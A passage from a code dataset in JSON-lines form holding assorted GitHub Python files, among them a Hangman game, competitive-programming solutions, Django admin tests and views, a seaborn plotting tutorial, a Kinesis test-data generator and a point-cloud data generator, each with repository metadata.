['_'] * len(secretWord)\n for i in range(len(secretWord)):\n if secretWord[i] in correctLetters:\n blanks[i] = secretWord[i]\n\n print(' '.join(blanks))\n\ndef getPlayerGuess(alreadyGuessed):\n while True:\n print('Guess a letter.')\n guess = input('> ').upper()\n if len(guess) != 1:\n print('Пожалуйста, введите одну букву.')\n elif guess in alreadyGuessed:\n print('Вы уже угадали эту букву. Выберите снова.')\n elif not guess.isalpha():\n print('Пожалуйста, введите БУКВУ.')\n else:\n return guess\n\nif __name__ == '__main__':\n try:\n main()\n except KeyboardInterrupt:\n sys.exit()\n","repo_name":"SadeVast/Python_Projects","sub_path":"Chapter_34/Hangman.py","file_name":"Hangman.py","file_ext":"py","file_size_in_byte":2862,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"32852616884","text":"import sys\ninput = sys.stdin.readline\n\nn = int(input())\nres = 0\n\nfor i in range(1, n):\n s = sum([int(j) for j in str(i)])\n if i + s == n:\n res = i\n break\n\nprint(0 if res == 0 else res)","repo_name":"DohyunJegal/Baekjoon","sub_path":"class2/2231.py","file_name":"2231.py","file_ext":"py","file_size_in_byte":204,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"14313672117","text":"from datetime import date\n\nfrom django.contrib import admin\nfrom django.contrib.admin.sites import AdminSite\nfrom django.core.files.uploadedfile import SimpleUploadedFile\nfrom django.test import RequestFactory, TestCase\nfrom django.urls import reverse\n\nfrom ..admin import CandidateAdmin\nfrom ..models import Candidate\n\n\nclass CandidateAdminTest(TestCase):\n\n def setUp(self):\n self.factory = RequestFactory()\n self.site = AdminSite()\n self.candidate = Candidate.objects.create(\n status='A',\n firstname='John',\n lastname='Doe',\n email='johndoe@example.com',\n birth_date=date(1990, 1, 1),\n phonenumber='1234567890',\n job='12345',\n personality='I am outgoing',\n salary='100000',\n gender='M',\n experience=True,\n smoker='N',\n file=SimpleUploadedFile('file.txt', b'file_content'),\n image=SimpleUploadedFile('image.jpg', b'image_content'),\n note='test note',\n languages=['Python', 'Javascript'],\n 
frameworks=['Django'],\n databases=['PostgreSQL', 'MySQL'],\n libraries=['Bootstrap', 'jQuery'],\n mobile=['Flutter', 'React native'],\n others=['GIT', 'Docker'],\n institution='Example University',\n course='Computer Science',\n started_course=date(2010, 1, 1),\n finished_course=date(2014, 1, 1),\n course_description='Description',\n course_status='I have completed the course',\n company='Example Company',\n position='Software Developer',\n started_job=date(2014, 1, 1),\n finished_job=date(2018, 1, 1),\n about_job='Description',\n employed=True,\n remote=True,\n travel=True,\n message='Test message'\n )\n self.candidate_pending = Candidate.objects.create(\n status='P',\n firstname='John',\n lastname='Pending',\n email='johndoe@example.com',\n birth_date=date(1990, 1, 1),\n phonenumber='1234567890',\n job='12345',\n personality='I am outgoing',\n salary='100000',\n gender='M',\n experience=True,\n smoker='N',\n file=SimpleUploadedFile('file.txt', b'file_content'),\n image=SimpleUploadedFile('image.jpg', b'image_content'),\n note='test note',\n languages=['Python', 'Javascript'],\n frameworks=['Django'],\n databases=['PostgreSQL', 'MySQL'],\n libraries=['Bootstrap', 'jQuery'],\n mobile=['Flutter', 'React native'],\n others=['GIT', 'Docker'],\n institution='Example University',\n course='Computer Science',\n started_course=date(2010, 1, 1),\n finished_course=date(2014, 1, 1),\n course_description='Description',\n course_status='I have completed the course',\n company='Example Company',\n position='Software Developer',\n started_job=date(2014, 1, 1),\n finished_job=date(2018, 1, 1),\n about_job='Description',\n employed=True,\n remote=True,\n travel=True,\n message='Test message'\n )\n self.candidate_disapproved = Candidate.objects.create(\n status='D',\n firstname='John',\n lastname='Disapproved',\n email='johndoe@example.com',\n birth_date=date(1990, 1, 1),\n phonenumber='1234567890',\n job='12345',\n personality='I am outgoing',\n salary='100000',\n gender='M',\n experience=True,\n smoker='N',\n file=SimpleUploadedFile('file.txt', b'file_content'),\n image=SimpleUploadedFile('image.jpg', b'image_content'),\n note='test note',\n languages=['Python', 'Javascript'],\n frameworks=['Django'],\n databases=['PostgreSQL', 'MySQL'],\n libraries=['Bootstrap', 'jQuery'],\n mobile=['Flutter', 'React native'],\n others=['GIT', 'Docker'],\n institution='Example University',\n course='Computer Science',\n started_course=date(2010, 1, 1),\n finished_course=date(2014, 1, 1),\n course_description='Description',\n course_status='I have completed the course',\n company='Example Company',\n position='Software Developer',\n started_job=date(2014, 1, 1),\n finished_job=date(2018, 1, 1),\n about_job='Description',\n employed=True,\n remote=True,\n travel=True,\n message='Test message'\n )\n self.admin_user = CandidateAdmin(Candidate, admin.site)\n\n def test_change_view_redirect(self):\n \"\"\"Test that after saving a candidate, user is redirected to the candidate detail page.\"\"\"\n request = self.factory.post(reverse('admin:human_resource_candidate_change', args=[self.candidate.id]), data={\n 'firstname': 'John',\n 'lastname': 'Doe',\n 'email': 'johndoe@example.com',\n 'status': 'A'\n })\n request.user = None\n response = self.admin_user.change_view(request, str(self.candidate.id))\n self.assertEqual(response['Location'], self.candidate.get_absolute_url())\n\n def test_get_fields(self):\n request = self.factory.get('/admin/candidate/')\n fields = self.admin_user.get_fields(request, self.candidate)\n 
self.assertNotIn('firstname', fields)\n self.assertNotIn('lastname', fields)\n\n def test_job_status_approved(self):\n status_text = self.admin_user.job_status(self.candidate)\n self.assertIn('color: #28a745', status_text)\n self.assertIn('Approved', status_text)\n\n def test_job_status_pending(self):\n status_text = self.admin_user.job_status(self.candidate_pending)\n self.assertIn('color: #fea95e', status_text)\n self.assertIn('Pending', status_text)\n\n def test_job_status_disapproved(self):\n status_text = self.admin_user.job_status(self.candidate_disapproved)\n self.assertIn('color: red', status_text)\n self.assertIn('Disapproved', status_text)\n\n def test_list_display(self):\n list_display = self.admin_user.get_list_display(None)\n self.assertEqual(list_display, ['__str__', 'email', 'job', 'created', 'job_status', '_'])\n\n def test_boolean(self):\n value = self.admin_user._(self.candidate)\n expected_value = True\n self.assertEqual(value, expected_value)\n\n value_pending = self.admin_user._(self.candidate_pending)\n expected_value_pending = None\n self.assertEqual(value_pending, expected_value_pending)\n\n value_disapproved = self.admin_user._(self.candidate_disapproved)\n expected_value_disapproved = False\n self.assertEqual(value_disapproved, expected_value_disapproved)\n","repo_name":"Pythonian/django_mastery","sub_path":"human_resource/tests/test_admin.py","file_name":"test_admin.py","file_ext":"py","file_size_in_byte":7112,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"76"} +{"seq_id":"20775627783","text":"\"\"\"BasicFunctions URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/1.10/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.conf.urls import url, include\n 2. 
Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))\n\"\"\"\nfrom django.conf.urls import url\nfrom django.contrib import admin\nfrom candidateManager.views import * \n\n\nurlpatterns = [\n \n url(r'^$', Candidates_List.as_view(), name='candidate_list'),\n url(r'^new$', Candidates_Create.as_view(), name='candidate_new'),\n url(r'^edit/(?P\\d+)$', Candidates_Update.as_view(), name='candidate_edit'),\n url(r'^delete/(?P\\d+)$', Candidates_Delete.as_view(), name='candidate_delete'),\n url(r'^detail/(?P\\d+)$', Candidates_Detail.as_view(), name='candidate_detail'),\n url(r'^notes/add/(?P\\d+)$', Note_Create.as_view(), name='notes_create'),\n]\n","repo_name":"rayan1234sn/BasicFuncitons","sub_path":"candidateManager/candidate_urls.py","file_name":"candidate_urls.py","file_ext":"py","file_size_in_byte":1254,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"21930003757","text":"import os\nimport json\nimport boto3\nimport random\n\n\ndef getData(iotName, lowVal, highVal):\n data = {}\n data['iotName'] = iotName\n data['iotValue'] = random.randint(lowVal, highVal)\n return data\n\n\nwhile 1:\n kinesis = boto3.client('kinesis')\n rnd = random.random()\n if (rnd < 0.01):\n data = json.dumps(getData('DemoSensor', 100, 120))\n kinesis.put_record(\n StreamName=os.environ['STREAM_NAME'],\n Data=data,\n PartitionKey='shardId-000000000000')\n print('***************************** anomaly ************************* {}'.format(data))\n else:\n data = json.dumps(getData('DemoSensor', 10, 20))\n kinesis.put_record(\n StreamName=os.environ['STREAM_NAME'],\n Data=data,\n PartitionKey='shardId-000000000000')\n print(data)\n","repo_name":"knakayama/aws-cloudformation-playground","sub_path":"kinesis/test1/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":868,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"76"} +{"seq_id":"13396489862","text":"from itertools import permutations\r\nN = int(input())\r\nS = input()\r\n# 全ての組み合わせ - (Si=Sj and Si=Sk and SandSk) - (j-i=k-j) \r\n\r\n# res = N**3\r\n\r\n# for i in range(N):\r\n# for j in range(N):\r\n# for k in range(N):\r\n# if not i N: continue\r\n if S[i] == S[k] or S[k] == S[j]: continue\r\n total -= 1\r\n\r\nprint(total) \r\n\r\n\r\n\r\n\r\n","repo_name":"takin6/algorithm-practice","sub_path":"at_coder/abc/old/162/d_2.py","file_name":"d_2.py","file_ext":"py","file_size_in_byte":1763,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"27088299200","text":"# (05)*****************distplot part 02 in seaborn***************************\n\n# ------------importing the libraries\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nfrom scipy.stats import kde, norm\n\n# -----------importing the dataset in seaborn github repositry\ntip_df=sns.load_dataset('tips')\n# print(tip_df)\n\n# ////we use these parameters in dist function\nparameters=\"\"\"(a=None, bins=None, hist=True, kde=True, rug=False, fit=None, hist_kws=None, kde_kws=None, rug_kws=None, fit_kws=None, color=None, vertical=False, norm_hist=False, axlabel=None, label=None, ax=None, x=None)\"\"\"\n\n# /////this is the code of seaborn\n# ////if we want to increase the figure size than we use plt.figure function\n# plt.figure(figsize=(13,13))\n\nbins=[5,10,15,20,25,30,35,40,45,50,55]\n# /////if we want to change the line background color than we use set function\nsns.set() \n# 
sns.distplot(tip_df['total_bill'],bins=bins)\n\n# /////if we use xtrick than we shown the x-label indexs\nplt.xticks(bins)\n\n# /////when we want to change the line colors as we wish than we use hist-kws(histpgram-keywords) functions and we input in dictionary\n# //////when we want to change the edgecolor than we use edge color function\n# /////when we want to increse the linewidth than we use linewidth function\n# ////when we want to change the stple of the line then we use linestyle function\n# ////if we want to increrase or decrese the opacity of the line color than we use alpha function and we input value(0-1)\n# sns.distplot(tip_df['total_bill'],bins=bins,hist_kws={'color':'red','edgecolor':'yellow','linewidth':5,'linestyle':'--','alpha':0.9})\n\n# //////if we want to change the kernal-density-estimate(kde) color, opasity, linewidth, linestyle than we use kde_kws(kernal-density-estimate keywords) and it is also input in dictionary \n# sns.distplot(tip_df['total_bill'],bins=bins,hist_kws={'color':'red','edgecolor':'yellow','linewidth':5,'linestyle':'--','alpha':0.9}, kde_kws={'color':'g','linewidth':5,'linestyle':'--','alpha':0.9})\n\n# /////if we want to change the rug color,linewidth, linestyle,opasity than we use rug_kws function\n# sns.distplot(tip_df['total_bill'],bins=bins,hist_kws={'color':'red','edgecolor':'yellow','linewidth':5,'linestyle':'--','alpha':0.9}, kde_kws={'color':'g','linewidth':5,'linestyle':'--','alpha':0.9},rug=True,rug_kws={'color':'k','linewidth':3,'linestyle':'--','alpha':0.9})\n\n# //////if we want to change the normalize line color,linewidth,linestyle and opasity than we use fit_kws function and we also kde=False\n# /////if we want to show the label than we use label function\n# sns.distplot(tip_df['total_bill'],bins=bins,hist_kws={'color':'red','edgecolor':'yellow','linewidth':5,'linestyle':'--','alpha':0.9},kde=False,rug=True,rug_kws={'color':'k','linewidth':3,'linestyle':'--','alpha':0.9},fit=norm,fit_kws={'color':'m','linewidth':3,'linestyle':'--','alpha':0.9},label=\"Sultan's Production\")\n\n# /////if we want to multiple graph is showing gthe one graph than we use this function\nsns.distplot(tip_df['size'],label='size')\nsns.distplot(tip_df['tip'],label='tip')\nsns.distplot(tip_df['total_bill'],label='Total_Bill')\n\n\n# /////Creating the title, xlabel and also ylabel function\nplt.title(\"Histogram of Resturent\",fontsize=25)\nplt.xlabel(\"Total Bills\",fontsize=15)\nplt.ylabel(\"Indexs\",fontsize=15)\nplt.legend(loc=2)\n\n# /////if we want to sorting the values than we use sort function\n# print(tip_df.total_bill.sort_values())\n\n# ////to showing the graph we use plt.show() FUNCTION and this is the matplotli function\nplt.show()\n","repo_name":"tayyabmalik4/SeabornWithTayyab","sub_path":"05_displot_part_02.py","file_name":"05_displot_part_02.py","file_ext":"py","file_size_in_byte":3576,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"34171402899","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Project : Python.\n# @File : baseline\n# @Time : 2022/11/22 上午9:02\n# @Author : yuanjie\n# @WeChat : meutils\n# @Software : PyCharm\n# @Description :\n\n\nfrom sklearn.metrics import mean_squared_error, roc_auc_score\nfrom sklearn.preprocessing import LabelEncoder\n\n# ME\nfrom meutils.pipe import *\nfrom meutils.hash_utils import md5\n\nfrom aizoo.tab.models import LGBMOOF\nfrom aizoo.tab.eda import EDA\nfrom aizoo.tab.feature_engineer import FE\n\n\n@decorator\ndef disk_cache(func, 
location='cachedir', *args, **kwargs):\n k = md5(f\"cache_{func.__name__}_{args}_{kwargs}\")\n output = Path(location) / Path(k) / '__output.pkl'\n\n if output.is_file():\n return joblib.load(output)\n\n else:\n logger.info(f\"CacheKey: {k}\")\n output.parent.mkdir(parents=True, exist_ok=True)\n _ = func(*args, **kwargs)\n joblib.dump(_, output)\n return _\n\n\ndef submit(scores=100.00, filename='result.json'):\n print(pd.Series(scores).value_counts())\n df_label[['car_id']][7117:].assign(score=scores).to_json(filename, 'records')\n\n\n@disk_cache\ndef load_data():\n dfs = pd.read_excel('data.xlsx', sheet_name=None)\n df_label = pd.read_json('phase1_train.json').append(pd.read_json('phase1_test.json'), ignore_index=True)\n return dfs, df_label\n\n\ndfs, df_label = load_data()\ndf_label = df_label.assign(\n label_100=lambda df: np.where(df.score >= 100, 1, 0),\n label_99=lambda df: np.where(df.score >= 99, 1, 0),\n label_98=lambda df: np.where(df.score >= 98, 1, 0),\n label_97=lambda df: np.where(df.score >= 97, 1, 0),\n label_96=lambda df: np.where(df.score >= 96, 1, 0),\n)\ncar_id_set = set(df_label.car_id)\n\ncolumns = {\n '车辆牌照号': 'car_id',\n '车牌号': 'car_id',\n '车牌号码': 'car_id',\n '单位名称': '企业名称'\n}\nfor sheet in dfs:\n dfs[sheet] = dfs[sheet].rename(columns=columns).dropna(axis=1, how='all').drop_duplicates()\n\n# df_label[df_label.car_id.isin(dfs['运政车辆年审记录信息'][lambda df: df['审批结果']=='年审不合格'].car_id)] # 有车牌颜色会变 脏数据\ndf_运政车辆年审记录信息 = (\n dfs['运政车辆年审记录信息'].replace({'年审合格': 1, '年审不合格': 0})\n .pivot_table(values='审批结果', columns='年审年度', aggfunc=max, index='car_id')\n .add_prefix('年审')\n .assign(年审sum=lambda df: df.sum(1))\n .reset_index()\n)\n\ndf_车辆违法违规信息 = (\n dfs['车辆违法违规信息(道路交通安全,来源抄告)'].assign(道路交通安全=1)\n .append(dfs['车辆违法违规信息(交通运输违法,来源抄告)'].assign(道路交通安全=0)).sort_values(['car_id', '违规时间'], ignore_index=True)\n)\ndf_车辆违法违规信息['违规时间'] = pd.to_datetime(df_车辆违法违规信息['违规时间'])\ndf_车辆违法违规信息['违规时间间隔'] = df_车辆违法违规信息.groupby('car_id')['违规时间'].diff().dt.days\ndf_车辆违法违规信息 = df_车辆违法违规信息.groupby('car_id').agg({'道路交通安全': ['nunique', 'count'], '违规时间间隔': ['mean', 'std']})\ndf_车辆违法违规信息.columns = ['_'.join(i) for i in df_车辆违法违规信息.columns]\ndf_车辆违法违规信息.reset_index(inplace=True)\n\n\ndf_动态监控报警信息 = dfs['动态监控报警信息(车辆,超速行驶)'].append(dfs['动态监控报警信息(车辆,疲劳驾驶)']).drop_duplicates().replace({'超速报警': 0, '疲劳报警': 1})\n\n\ndef kurt(x):\n return x.kurt()\n\nfuncs = ['sum','max','min','mean','median','std'] + ['skew', kurt]\nagg_func = {\n '报警类型': 'count',\n '最高时速(Km/h)': funcs,\n '持续点数': funcs,\n '持续时长(秒)': funcs,\n # '时间差': funcs,\n}\ndf_报警类型 = df_动态监控报警信息.groupby('报警类型').agg(agg_func)\ndf_报警类型.columns = ['_'.join(i) for i in df_报警类型.columns]\n\ndf_动态监控报警信息 = df_动态监控报警信息.merge(df_报警类型.reset_index())\n\n\nagg_func = dict(zip(df_报警类型.columns, [['mean', 'std']]*len(df_报警类型.columns)))\nagg_func['car_id'] = 'count'\nagg_func['报警类型'] = agg_func['最高时速(Km/h)'] = agg_func['持续点数'] = agg_func['持续时长(秒)'] = funcs\n\n\ndf_动态监控报警信息 = df_动态监控报警信息.groupby('car_id').agg(agg_func)\ndf_动态监控报警信息.columns = ['_'.join(i) for i in df_动态监控报警信息.columns]\ndf_动态监控报警信息.reset_index(inplace=True)\n\n\ndf = (\n df_label\n .merge(dfs['运政车辆信息'], 'left')\n .merge(dfs['运政业户信息'][['企业名称', '业户ID']], 'left')\n .merge(dfs['运政质量信誉考核记录'].sort_values('考核日期').drop_duplicates('业户ID', 'last').replace({'优良(AAA)': 0, '合格(AA)': 1, '基本合格(A)': 2, '不合格(B)': 3}), 'left')\n .merge(dfs['动态监控上线率(企业,%)'], 'left')\n .merge(df_运政车辆年审记录信息, 'left')\n .merge(df_动态监控报警信息, 'left')\n .merge(df_车辆违法违规信息, 'left')\n)\n\nfor feat in df.columns:\n if feat in ['label', 'car_id']:\n continue\n if 
df[feat].dtypes!='float':\n df[feat] = LabelEncoder().fit_transform(df[feat]) \n","repo_name":"yuanjie-ai/AIZoo","sub_path":"__CompetitionBaseline/2022中国华录杯数据湖算法大赛—企业安全风险评估赛道/baseline.py","file_name":"baseline.py","file_ext":"py","file_size_in_byte":5316,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"76"} +{"seq_id":"8245621301","text":"from django.contrib import messages\nfrom django.views import View\nfrom django.views.generic import FormView\nfrom django.shortcuts import redirect, get_object_or_404\nfrom webapp.forms import BasketAddForm\nfrom webapp.models import Product, Basket\n\n\nclass BasketAddFormView(FormView):\n form_class = BasketAddForm\n\n def post(self, request, *args, **kwargs):\n product = get_object_or_404(Product, pk=kwargs.get('pk'))\n form = self.get_form_class()(request.POST)\n if form.is_valid():\n number = form.cleaned_data.get('number')\n\n if not Basket.objects.filter(product=product).exists():\n # Проверяем остаток товаров на складе по введенному числу\n if number > product.balance:\n messages.error(\n request,\n f'На складе всего {product.balance} товаров,'\n f' поэтому добавление {number} невозможно'\n )\n return redirect('index')\n Basket.objects.create(product=product, number=number)\n messages.success(request, 'Желаемое количество товаров успешно добавлено!')\n else:\n basket = Basket.objects.filter(product=product).first()\n # Проверяем остаток товаров на складе по введенному числу + числу в корзине\n if (number + basket.number) > product.balance:\n messages.error(\n request,\n f'Вы пытаетесь добавить {number + basket.number} с учетом {basket.number},'\n f' которые уже добавили, а на складе всего {product.balance}'\n )\n return redirect('index')\n basket.number += number\n basket.save()\n messages.success(request, 'Желаемое количество товаров успешно добавлено!')\n return redirect('index')\n\n\nclass BasketDeleteOneView(View):\n def get(self, request, *args, **kwargs):\n basket_product = get_object_or_404(Basket, pk=kwargs.get('pk'))\n if not basket_product.number == 1:\n basket_product.number -= 1\n basket_product.save()\n messages.success(request, 'Количество товара в корзине уменьшено на 1')\n else:\n basket_product.delete()\n messages.success(request, 'Товар был удален из корзины, так как был в 1-ом числе')\n return redirect('basket_list')\n\n\nclass BasketDeleteView(View):\n\n def post(self, request, *args, **kwargs):\n basket_product = get_object_or_404(Basket, pk=kwargs.get('pk'))\n basket_product.delete()\n messages.success(request, 'Товар удален из корзины')\n return redirect('basket_list')\n","repo_name":"TagleD/homework_60_gleb_tarakanov","sub_path":"source/webapp/views/baskets.py","file_name":"baskets.py","file_ext":"py","file_size_in_byte":3154,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"34293200723","text":"################# Turtle - speed, size, goto, penup/down #################\n\nimport turtle\n\ns = turtle.Screen()\nt = turtle.Turtle()\n\n# setare viteza desenare\nt.speed(1)\n\n# setare grosime creion\nt.pensize(2)\n\n# ridica creionul(cursorul) de pe canvas\nt.penup()\n\n# muta creionul (cursorul) la coorodonatele (0, 0)\nt.goto(0, 0)\n\n# pune creionul inapoi pe canvas\nt.pendown()\n\nt.goto(0, 100)\n\n# ascunde 
cursorul\nt.hideturtle()\ns.mainloop()","repo_name":"flaviaalexandra11/lectii-python","sub_path":"ex-turtle/exemple/2_goto.py","file_name":"2_goto.py","file_ext":"py","file_size_in_byte":432,"program_lang":"python","lang":"ro","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"27562885142","text":"import random\nimport numpy as np\nfrom shapely.geometry import Point\nfrom shapely.geometry.polygon import Polygon\nimport csv\nimport collections\nfrom numpy.linalg import lstsq\nfrom numpy import ones, vstack\n\nBUFFER = 1\nPOINTS_PER_POLYGON = 1000\n\nMAX_DATA_NUM = 100\nCONVEX_OPT = 'convex'\nSET_NUM = 5\nDATA_DIR = \"../data/problem3/extruded/\"\n\nMINIMUM_RATIO = 0.6\nVOXEL = 20\nINTERVAL = int(100 / VOXEL)\nVOXEL_SHAPE = (VOXEL, VOXEL, VOXEL)\nEquation = collections.namedtuple('Equation', 'a b c') # ax + by + c = 0\n\n\ndef make_equation_list(x_data, y_data):\n equations = []\n for i in range(len(x_data) - 1):\n x_coords = [x_data[i], x_data[i + 1]]\n y_coords = [y_data[i], y_data[i+1]]\n equ = make_equation(x_coords, y_coords)\n equations.append(equ)\n return equations\n\n\ndef make_equation(x_coords, y_coords):\n assert ((x_coords[0] != x_coords[1]) | (y_coords[0] != y_coords[1]))\n # x = c\n if x_coords[0] == x_coords[1]:\n equ = Equation(1, 0, -x_coords[0])\n return equ\n\n A = vstack([x_coords, ones(len(x_coords))]).T\n m, c = lstsq(A, y_coords)[0] # y = mx + c\n equ = Equation(m, -1, c)\n return equ\n\n\ndef generate_random_point_in_rectangle(center, buffer):\n x_value = random.randrange(center[0]-buffer, center[0]+buffer+1)\n y_value = random.randrange(center[1]-buffer, center[1]+buffer+1)\n return x_value, y_value\n\n\ndef generate_points_along_sides(x_data, y_data, point_num):\n equations = make_equation_list(x_data, y_data)\n\n pc = []\n for step in range(point_num):\n r_index = random.randrange(0, len(equations))\n x_coords = [x_data[r_index], x_data[r_index+1]]\n y_coords = [y_data[r_index], y_data[r_index+1]]\n equ = equations[r_index]\n\n min_x = min(x_coords)\n max_x = max(x_coords)\n x_random = random.randrange(min_x, max_x + 1)\n b = equ.b\n if b == 0:\n low = min(y_coords) - BUFFER\n upp = max(y_coords) + BUFFER\n y_random = random.randrange(low, upp + 1)\n elif b == -1:\n y_random = int(equ.a * x_random + equ.c)\n else:\n return\n result_x, result_y = generate_random_point_in_rectangle([x_random, y_random], BUFFER)\n pc.append([result_x, result_y, 0])\n return pc\n\n\ndef create_polygon(x_coords, y_coords):\n xy = zip(x_coords, y_coords)\n return Polygon(xy)\n\n\ndef generate_points_along_top_bottom(x_data, y_data, point_num, top_height):\n pc = []\n pg = create_polygon(x_data, y_data)\n min_x = min(x_data)\n max_x = max(x_data)\n min_y = min(y_data)\n max_y = max(y_data)\n\n while len(pc) < point_num:\n random_x = random.randrange(min_x, max_x+1)\n random_y = random.randrange(min_y, max_y+1)\n\n if not pg.contains(Point(random_x, random_y)):\n continue\n\n is_in_top = random.randrange(0, 2)\n if is_in_top:\n random_height = random.randrange(top_height - BUFFER, top_height + BUFFER + 1)\n else:\n random_height = random.randrange(0, BUFFER + 1)\n pc.append([random_x, random_y, random_height])\n return pc\n\n\ndef make_target_point(x_data, y_data, max_height, want_in=False):\n min_x = min(x_data)\n max_x = max(x_data)\n min_y = min(y_data)\n max_y = max(y_data)\n pg = create_polygon(x_data, y_data)\n\n x_dist = max_x - min_x\n y_dist = max_y - min_y\n if want_in:\n random_x = random.randrange(int(min_x), int(max_x) + 1)\n random_y = 
random.randrange(int(min_y), int(max_y) + 1)\n random_height = random.randrange(0, int(max_height) + 1)\n else:\n random_x = random.randrange(int(min_x - x_dist * 0.5), int(max_x + x_dist * 0.5) + 1)\n random_y = random.randrange(int(min_y - y_dist * 0.5), int(max_y + y_dist * 0.5) + 1)\n random_height = random.randrange(0, int(max_height * 1.5) + 1)\n if random_height > 100:\n random_height = 100\n\n label = pg.contains(Point(random_x, random_y)) and random_height < max_height\n return [random_x, random_y, random_height], label\n\n\ndef generate_data(solids_reader, vector_writer, raster_writer):\n num_of_out = 0\n write_num = 0\n solids = []\n for rid, row in enumerate(solids_reader):\n solids.append(row)\n\n vector_rows = []\n raster_rows = []\n\n while write_num < MAX_DATA_NUM:\n row = solids[random.randrange(0, rid + 1)]\n if write_num % 10 == 0:\n print(write_num, \"...\")\n\n convex_ratio = row[0]\n num_sides = row[1]\n height = row[2]\n polygon_coords = row[3:]\n polygon_coords.extend([polygon_coords[0], polygon_coords[1]])\n x_data = polygon_coords[0:][::2]\n y_data = polygon_coords[1:][::2]\n\n # pointcloud polygon\n pcp_list = generate_points_along_sides(x_data, y_data, POINTS_PER_POLYGON * 4)\n for point in pcp_list:\n point[2] = random.randrange(0, height + 1)\n\n pcp_list_2 = generate_points_along_top_bottom(x_data, y_data, POINTS_PER_POLYGON * 2, height)\n pcp_list.extend(pcp_list_2)\n pcp_flatten_list = [element for tupl in pcp_list for element in tupl]\n\n if num_of_out > MAX_DATA_NUM / 2:\n target_point, label = make_target_point(x_data, y_data, height, True)\n else:\n target_point, label = make_target_point(x_data, y_data, height)\n\n if not label:\n if num_of_out > MAX_DATA_NUM * MINIMUM_RATIO:\n continue\n num_of_out += 1\n '''\n vector data\n target point, [boundary_points], label\n '''\n vector_row = target_point\n vector_row.extend(pcp_flatten_list)\n vector_row.append(int(label))\n # vector_writer.writerow(vector_row)\n vector_rows.append(vector_row)\n\n '''\n raster data\n [voxel] label\n '''\n voxel = np.zeros(VOXEL_SHAPE)\n for point in pcp_list:\n x = int(point[0] / INTERVAL)\n x = min(x, VOXEL - 1)\n x = max(x, 0)\n y = int(point[1] / INTERVAL)\n y = min(y, VOXEL - 1)\n y = max(y, 0)\n z = int(point[2] / INTERVAL)\n z = min(z, VOXEL - 1)\n z = max(z, 0)\n voxel[x][y][z] = 1\n\n x = int(target_point[0] / INTERVAL)\n x = min(x, VOXEL - 1)\n x = max(x, 0)\n y = int(target_point[1] / INTERVAL)\n y = min(y, VOXEL - 1)\n y = max(y, 0)\n z = int(target_point[2] / INTERVAL)\n z = min(z, VOXEL - 1)\n z = max(z, 0)\n voxel[x][y][z] = 2\n\n raster_row = [int(item2) for sublist in voxel for item in sublist for item2 in item]\n raster_row.append(int(label))\n # raster_writer.writerow(raster_row)\n raster_rows.append(raster_row)\n\n write_num += 1\n random.shuffle(vector_rows)\n random.shuffle(raster_rows)\n vector_writer.writerows(vector_rows)\n raster_writer.writerows(raster_rows)\n\n\nif __name__ == \"__main__\":\n solids_csv = open(DATA_DIR + CONVEX_OPT + \"_solids.csv\", newline='')\n solids_reader = csv.reader(solids_csv, quoting=csv.QUOTE_NONNUMERIC)\n\n raster_test_csv = open(DATA_DIR + CONVEX_OPT + \"/raster/\" + str(VOXEL) + \"/test\" + \".csv\", 'w', encoding='utf-8', newline='')\n raster_test_writer = csv.writer(raster_test_csv)\n\n vector_test_csv = open(DATA_DIR + CONVEX_OPT + \"/vector/\" + str(VOXEL) + \"/test\" + \".csv\", 'w', encoding='utf-8', newline='')\n vector_test_writer = csv.writer(vector_test_csv)\n\n for set_num in range(SET_NUM):\n print(\"Train 
\", set_num)\n raster_train_csv = open(DATA_DIR + CONVEX_OPT + \"/raster/\" + str(VOXEL) + \"/training_\" + str(set_num) + \".csv\", 'w', encoding='utf-8', newline='')\n raster_train_writer = csv.writer(raster_train_csv)\n\n vector_train_csv = open(DATA_DIR + CONVEX_OPT + \"/vector/\" + str(VOXEL) + \"/training_\" + str(set_num) + \".csv\", 'w', encoding='utf-8', newline='')\n vector_train_writer = csv.writer(vector_train_csv)\n\n solids_csv.seek(0)\n generate_data(solids_reader, vector_train_writer, raster_train_writer)\n\n raster_train_csv.close()\n vector_train_csv.close()\n print(\"Test \")\n\n solids_csv.seek(0)\n generate_data(solids_reader, vector_test_writer, raster_test_writer)\n raster_test_csv.close()\n vector_test_csv.close()\n\n\n\n\n\n\n","repo_name":"cocoslime/point-in-PC-polygon","sub_path":"pointcloud-polygon-generator/problem3-extrude-pc.py","file_name":"problem3-extrude-pc.py","file_ext":"py","file_size_in_byte":8340,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"9323076591","text":"# Your API KEYS (you need to use your own keys - very long random characters)\n# from config import MAPBOX_TOKEN, MBTA_API_KEY\nimport requests\nimport json\nimport math\nfrom math import radians, cos, sin, asin, sqrt\n# Useful URLs (you need to add the appropriate parameters for your requests)\nMAPBOX_BASE_URL = \"https://api.mapbox.com/geocoding/v5/mapbox.places\"\nMBTA_BASE_URL = \"https://api-v3.mbta.com/stops\"\n\n\n# A little bit of scaffolding if you want to use 